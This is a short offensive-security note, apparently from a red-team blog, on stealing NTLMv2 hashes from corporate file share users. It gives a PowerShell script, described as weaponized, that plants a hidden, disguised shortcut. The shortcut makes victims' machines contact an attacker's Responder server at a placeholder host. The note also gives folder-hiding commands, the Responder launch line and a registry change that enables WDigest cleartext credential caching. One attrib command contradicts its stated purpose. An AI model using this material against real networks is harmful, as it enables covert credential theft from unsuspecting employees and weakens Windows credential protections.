A neat little trick to gather NTLMv2 Hashes every time a corporate file share got accessed, is to create a malicious file,
which takes place in the same directory on the fileshare.
At first it is necessary to create the malicious file with the following script from v3ded's blog which I modified slightly to weaponize it for the use with Responder.
$path = "$([Environment]::GetFolderPath('Desktop'))\<FILE>.lnk"
$wshell = New-Object -ComObject Wscript.Shell
$shortcut = $wshell.CreateShortcut($path)
$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
$shortcut.TargetPath = "cmd.exe"
$shortcut.Arguments = "/c explorer.exe Z:\PATH\TO\SHARE & \\<LHOST>\foobar" # Calls the SMB share of the responder instance on the C2 server
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey = "CTRL+C"
$shortcut.Description = ""
$shortcut.WindowStyle = 7
# 7 = Minimized window
# 3 = Maximized window
# 1 = Normal window
$shortcut.Save()
(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)Next, switch the folder icon to the same icons as used on the fileshare. After that all is to hide the target folder with the following command.
C:\> attrib -h Z:\PATH\TO\FOLDER\<FOLDER>
After this the malicious file takes place in the same directory as the hidden non-malicious folder.
Everytime a user opens the folder, his NTLMv2 Hash got send to the C2 server which is running Responder.
$ sudo responder -I <INTERFACE>
PS C:\> Set-ItemProperty -Force -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name "UseLogonCredential" -Value '1'"